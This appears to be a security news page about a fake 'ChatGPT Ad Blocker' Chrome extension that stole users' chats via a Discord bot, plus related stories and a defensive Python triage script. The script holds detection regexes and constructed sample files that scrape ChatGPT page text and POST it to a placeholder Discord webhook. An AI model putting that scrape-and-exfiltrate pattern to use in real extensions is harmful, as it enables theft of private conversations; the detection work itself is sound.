Malicious ChatGPT Ad Blocker Chrome Extension Stole User Conversations
Researchers reported that a fake Chrome extension called "ChatGPT Ad Blocker" posed as a tool to remove ads from ChatGPT while secretly harvesting users' prompts and responses. The extension reportedly cloned the ChatGPT page DOM, extracted conversation text, and exfiltrated chats longer than 150 characters to a private Discord channel using a bot identified as Captain Hook, turning a supposed privacy tool into a straightforward data-theft mechanism.
The campaign appears to have capitalized on interest around ChatGPT advertising by luring users with bogus ad-blocking functionality. DomainTools linked the operation to suspicious domains including blockaiads.com, openadblock.com, and gptadblock.com, and found the extension checked a GitHub-hosted file hourly for remote instructions, suggesting active attacker control and the ability to update behavior over time. The developer account was reportedly tied to the handle krittinkalra and associated with AI platforms Writecream and AI4ChatCo, although no evidence was cited that those other apps also stole data.
Timeline
Apr 3, 2026
Technical analysis reveals Discord exfiltration and remote control behavior
Further reporting described how the extension sent conversations longer than 150 characters to a Discord bot named Captain Hook and checked a GitHub file hourly for remote instructions. Researchers also tied the extension to a developer account using the handle "krittinkalra" and warned users to avoid third-party tools associated with that developer.
May 8, 2023
Malicious 'ChatGPT Ad Blocker' extension campaign identified
DomainTools Investigations identified a malicious Chrome extension called "ChatGPT Ad Blocker" that impersonated an ad-blocking tool for ChatGPT while covertly stealing users' conversations. The extension cloned ChatGPT page content and exfiltrated prompts and responses to a private Discord channel, with infrastructure linked to domains such as blockaiads.com, openadblock.com, and gptadblock.com.
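The behaviours described in the summary and the timeline (a content script on the ChatGPT origin, a length gate on scraped text, an hourly alarm, a remote file pulled from GitHub, and a POST to a Discord endpoint) can be turned into a static triage check for an unpacked extension. The script below is an added example, not code from the report, from DomainTools or from the extension itself; the indicator names, the sample files and the EXAMPLE URLs are constructed.

```python
import json
import re

# Added example, not the extension's or the researchers' code. Regexes key on the
# behaviours reported: Discord exfiltration, hourly GitHub polling, a length gate.
SOURCE_INDICATORS = {
    "discord_exfil": re.compile(r"discord(?:app)?\.com/api/(?:webhooks|v\d+)", re.I),
    "github_remote_config": re.compile(r"raw\.githubusercontent\.com", re.I),
    "hourly_alarm": re.compile(r"periodInMinutes\s*:\s*60\b"),
    "length_gate": re.compile(r"\.length\s*>=?\s*1[0-9]{2}\b"),  # e.g. text.length > 150
}

def scan_manifest(manifest: dict) -> list[str]:
    """Flag a content script declared to run on the ChatGPT origin."""
    for cs in manifest.get("content_scripts", []):
        if any("chatgpt.com" in m or "chat.openai.com" in m for m in cs.get("matches", [])):
            return ["content_script_on_chatgpt"]
    return []

def scan_source(text: str) -> list[str]:
    return [name for name, rx in SOURCE_INDICATORS.items() if rx.search(text)]

def triage(files: dict[str, str]) -> tuple[str, dict[str, list[str]]]:
    """files maps a relative path to its contents. Returns (verdict, per-file hits)."""
    report = {}
    for path, text in files.items():
        hits = scan_manifest(json.loads(text)) if path.endswith("manifest.json") else scan_source(text)
        if hits:
            report[path] = hits
    found = {h for hits in report.values() for h in hits}
    if {"discord_exfil", "content_script_on_chatgpt"} <= found:
        verdict = "likely_conversation_theft"   # scrapes ChatGPT and ships it off-host
    elif found & {"discord_exfil", "github_remote_config", "hourly_alarm"}:
        verdict = "suspicious"                  # exfil or remote-control plumbing only
    else:
        verdict = "no_indicators"
    return verdict, report

# Constructed sample files mimicking the reported behaviour (placeholder URLs).
SAMPLE = {
    "manifest.json": json.dumps({"manifest_version": 3, "permissions": ["alarms", "storage"],
        "content_scripts": [{"matches": ["https://chatgpt.com/*"], "js": ["content.js"]}]}),
    "content.js": "const t=document.body.innerText; if(t.length>150) chrome.runtime.sendMessage(t);",
    "background.js": "chrome.alarms.create('cfg',{periodInMinutes:60});"
                     "fetch('https://raw.githubusercontent.com/EXAMPLE/cfg.json');"
                     "fetch('https://discord.com/api/webhooks/0/EXAMPLE',{method:'POST'});",
}
```

Run `triage(SAMPLE)` against a real unpacked extension by reading its files into the same path-to-contents dict; a verdict of `suspicious` still needs manual review of the flagged files.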
Related Stories

Malicious Chrome Extensions Steal ChatGPT and DeepSeek Conversations
Two rogue Chrome extensions, impersonating the legitimate AITOPIA AI sidebar tool, have compromised over 900,000 users by exfiltrating ChatGPT and DeepSeek conversations along with full browsing histories to attacker-controlled servers. The extensions, named "Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI" and "AI Sidebar with Deepseek, ChatGPT, Claude and more," request consent for "anonymous analytics" but covertly steal sensitive data, including proprietary code, business strategies, PII, and internal URLs. The malware operates by monitoring browser tabs, scraping chat content and session IDs, and sending Base64-encoded data to C2 servers every 30 minutes, exposing users to risks such as espionage, identity theft, and phishing. Researchers from OX Security discovered the threat, noting that the extensions remain available on the Chrome Web Store, with one losing its "Featured" badge after disclosure. The extensions also redirect users to each other if uninstalled, and their privacy policies are hosted on third-party sites to obscure their origins. The incident highlights the growing trend of browser extensions being used to capture AI chatbot conversations, a tactic dubbed "Prompt Poaching," and underscores the need for vigilance when installing browser add-ons, especially those requesting broad permissions under the guise of analytics or enhanced user experience.
1 month ago
Malicious Chrome Extensions Used for Credential Theft and Website Spoofing
Security researchers reported a surge in **malicious Chrome extensions** abusing high-privilege browser permissions to steal credentials and hijack authenticated sessions. LayerX identified at least **16 ChatGPT-related extensions** that mimic legitimate productivity tools and brands, then inject scripts into `chatgpt.com` to monitor outbound web requests and **exfiltrate authorization details and session tokens** to attacker-controlled infrastructure. With stolen tokens, attackers can impersonate victims’ ChatGPT sessions and potentially access connected data sources (e.g., integrations with *Slack* and *GitHub*), expanding impact beyond the AI service itself. Separately, Varonis documented a **malware-as-a-service** browser-extension toolkit dubbed **Stanley** being sold on Russian-language cybercrime forums, marketed to enable large-scale credential theft by **showing a phishing site while the URL bar continues to display the legitimate domain**. The toolkit uses a web-based control panel to configure per-victim “source” (legitimate) and “target” (phishing) URLs, then overlays a full-screen iframe to spoof the destination site; the seller also claims “guaranteed” placement in the **Chrome Web Store**, increasing the likelihood of user installation and enterprise exposure.
1 month ago
AiFrame Campaign: Fake AI Chrome Extensions Steal Credentials and Email Data
Researchers reported a coordinated campaign dubbed **AiFrame** involving 30+ malicious Google Chrome extensions masquerading as AI assistants (impersonating tools like **ChatGPT**, **Claude**, **Gemini**, and **Grok**) that collectively reached roughly **260,000–300,000 installs**. The extensions were found to **steal credentials, API keys, email content/messages, and browsing data**, and multiple items remained available in the Chrome Web Store at the time of reporting. LayerX attributed the set to a single operation based on shared code structure, permissions, and common command-and-control infrastructure under **`tapnetic[.]pro`** (including subdomains such as `claude.tapnetic.pro`). The extensions typically did not implement AI features locally; instead, they rendered a **full-screen iframe** that loaded remote content, enabling operators to change UI/logic and add capabilities without publishing an extension update. Reported high-install examples included **Gemini AI Sidebar** (`fppbiomdkfbhgjjdmojlogeceejinadg`, removed after reaching ~80k users) and apparent re-uploads/new IDs such as **AI Sidebar** (`gghdfkafnhfpaooiolhncejnlgglhkhe`, ~70k users), plus **AI Assistant** (`nlhpidbjmmffhoogcennoiopekbiglbp`, ~60k users, noted as having a “Featured” badge).
1 month ago